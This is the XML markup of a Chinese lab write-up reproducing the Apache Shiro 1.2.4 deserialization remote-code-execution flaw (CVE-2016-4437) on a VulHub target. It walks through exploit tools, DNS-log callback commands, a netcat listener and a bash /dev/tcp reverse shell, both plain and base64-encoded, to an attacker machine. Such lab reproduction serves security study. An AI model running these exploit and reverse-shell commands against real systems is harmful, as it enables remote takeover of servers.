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Shiro1.2.4 反序列化命令执行漏洞复现.docx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(By Jean)</w:t>
      </w:r>
    </w:p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</w:p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</w:p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4365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22" w:name="_GoBack"/>
          <w:bookmarkEnd w:id="2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_Toc1343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Shiro简介</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1343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_Toc21508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漏洞概述</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21508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_Toc25251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漏洞原理</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25251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_Toc17520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漏洞环境</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc17520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_Toc15036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rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>VulHub部署Shiro1.2.4 漏洞环境</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc15036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_Toc30383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5.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Centos上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc30383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_Toc20615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5.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows10上查看结果</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20615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_Toc7002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6. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>使用工具</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>ShiroScan</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>进行漏洞验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc7002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_Toc28032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6.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Kali上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28032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_Toc27682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6.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows10上查看结果</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27682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_Toc10799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7. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>使用工具shiro_rce进行漏洞验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc10799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_Toc13984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7.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Kali上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13984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_Toc8241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7.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows10上查看结果</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8241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_Toc20160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eastAsiaTheme="minorEastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t xml:space="preserve">7.3. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Kali上查看结果</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20160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_Toc31105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8. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>使用工具ShiroExploit进行漏洞验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc31105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_Toc11616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8.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows10上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc11616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_Toc12045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8.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows上查看结果</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc12045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_Toc25886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8.3. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Kali上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25886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_Toc6354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8.4. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows10上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6354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_Toc9838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8.5. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Kali上查看结果</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9838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_Toc17441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9. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>参考</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc17441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rPr>
              <w:rFonts w:hint="eastAsia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page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc1343"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Shiro简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="FFFFFF"/>
        <w:spacing w:after="150" w:afterAutospacing="0" w:line="240" w:lineRule="atLeast"/>
        <w:ind w:left="0" w:firstLine="42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Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc21508"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/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420" w:firstLine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Apache Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="t1"/>
      <w:bookmarkEnd w:id="2"/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" w:name="_Toc25251"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/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Apache Shiro 1.2.4反序列化漏洞分析漏洞原理分析，可参考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"https://www.freebuf.com/vuls/178014.html"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https://www.freebuf.com/vuls/178014.html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4" w:name="_Toc17520"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="19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0"/>
        <w:gridCol w:w="1862"/>
        <w:gridCol w:w="1682"/>
        <w:gridCol w:w="2138"/>
        <w:gridCol w:w="1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dxa"/>
          </w:tcPr>
          <w:p>
            <w:pP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名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr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操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1682" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pP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IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2138" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pP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版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1698" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pP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Java环境（java -version）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攻击机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Kali（VM虚拟机、NAT模式）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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192.168.96.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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Linux version 4.19.0-kali4-amd64 (devel@kali.org) (gcc version 8.3.0 (Debian 8.3.0-2)) #1 SMP Debian 4.19.28-2kali1 (2019-03-18)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1698" w:type="dxa"/>
          </w:tcPr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 version "1.8.0_191"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Java(TM) SE Runtime Environment (build 1.8.0_191-b12)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 HotSpot(TM) 64-Bit Server VM (build 25.191-b12, mixed mode)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靶机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>Centos7（VM虚拟机、NAT模式）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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192.168.96.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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CentOS Linux release 7.6.1810 (Core) </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1698" w:type="dxa"/>
          </w:tcPr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openjdk version "1.8.0_181"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OpenJDK Runtime Environment (build 1.8.0_181-b13)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OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)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Burpsuite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使用主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="186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Windows10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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172.20.10.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21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2004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1698" w:type="dxa"/>
          </w:tcPr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 version "1.8.0_211"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Java(TM) SE Runtime Environment (build 1.8.0_211-b12)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 HotSpot(TM) 64-Bit Server VM (build 25.211-b12, mixed mode)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5" w:name="_Toc15036"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>VulHub部署Shiro1.2.4 漏洞环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc30383"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Centos上执行操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/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进入漏洞目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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c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d /root/vulhub/shiro/CVE-</w:t>
      </w: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instrText xml:space="preserve"> HYPERLINK "http://www.baidu.com/link?url=Z-bxkJr3cISEmcQRdO6h4QujM7jSl7SE0q3779_Zetp16B40uphjOCJGARC4M1sTTk61Ql3FTT4AJZi9XVK5u_" \t "https://www.baidu.com/_blank" </w:instrText>
      </w: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CVE-2016-4437</w:t>
      </w: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2、使用docker一键部署启动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build &amp;&amp; docker-compose up -d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3、漏洞环境部署完成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"http://192.168.96.128:8080/login;jsessionid=E25CEA469E8FC9945FCB3E0CA1EF40D5" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://192.168.96.128:8080/login;jsessionid=E25CEA469E8FC9945FCB3E0CA1EF40D5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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4、关闭漏洞环境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当漏洞验证完成时，在漏洞目录执行docker-compose down关闭漏洞环境。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7" w:name="_Toc20615"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows10上查看结果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访问http://192.168.96.128:8080/login;jsessionid=C206EB4AADE7C756144BEA028204C1E2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3969385"/>
            <wp:effectExtent l="0" t="0" r="1905" b="571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账号密码为admin/vulhub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使用burpsuite进行抓包，发现Set-cookie中有rememberMe字段。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072640"/>
            <wp:effectExtent l="0" t="0" r="889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8" w:name="_Toc7002"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ShiroScan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行漏洞验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc28032"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali上执行操作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1、下载工具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git clone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"https://github.com/sv3nbeast/ShiroScan"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https://github.com/sv3nbeast/ShiroScan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.git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2、执行利用脚本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python shiro_rce.py http://192.168.96.128:8080 "ping 9vurou.dnslog.cn"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70500" cy="15347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10" w:name="_Toc27682"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows10上查看结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/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查看dnslog执行记录：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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="28555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11" w:name="_Toc10799"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用工具shiro_rce进行漏洞验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc13984"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali上执行操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/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1、下载工具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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,解压密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>wyzxxz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  <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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2、解压文件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7z x -pwyzxxz shiro_tool.zip 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  <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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3、执行以下命令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 -jar shiro_tool.jar http://192.168.96.128:8080  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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5111750" cy="3111500"/>
            <wp:effectExtent l="0" t="0" r="635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4、在第三步的基础上，选择0后，执行命令：curl cc5ost.dnslog.cn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  <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3909060"/>
            <wp:effectExtent l="0" t="0" r="0" b="25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5、获取shell</w:t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Nc开启端口监听：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4076700" cy="1701800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然后需要将shell反弹到kali主机，反弹shell的命令为：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bash -i &gt;&amp; /dev/tcp/192.168.96.129/7777 0&gt;&amp;1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  <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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对该命令进行base64编码（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"http://www.jackson-t.ca/runtime-exec-payloads.html"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http://www.jackson-t.ca/runtime-exec-payloads.html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t>），得到以下结果：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  <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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在第三步的基础上，选择0后，输入命令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk2LjEyOS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}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Chars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc8241"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows10上查看结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/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查看dnslog执行记录：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67325" cy="2543175"/>
            <wp:effectExtent l="0" t="0" r="317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 w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc20160"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali上查看结果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成功反弹shell：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2633980"/>
            <wp:effectExtent l="0" t="0" r="1905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bookmarkStart w:id="15" w:name="_Toc31105"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用工具ShiroExploit进行漏洞验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc11616"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows10上执行操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4813300" cy="5645150"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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64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17" w:name="_Toc12045"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows上查看结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="2849880"/>
            <wp:effectExtent l="0" t="0" r="9525" b="762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bookmarkStart w:id="18" w:name="_Toc25886"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali上执行操作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Nc开启端口监听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86050" cy="273050"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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19" w:name="_Toc6354"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows10上执行操作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使用该工具反弹shell到kali:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="3465195"/>
            <wp:effectExtent l="0" t="0" r="635" b="190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6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执行完毕：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272915"/>
            <wp:effectExtent l="0" t="0" r="3175" b="698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7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0" w:name="_Toc9838"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali上查看结果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成功反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4895850" cy="3206750"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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21" w:name="_Toc17441"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参考</w:t>
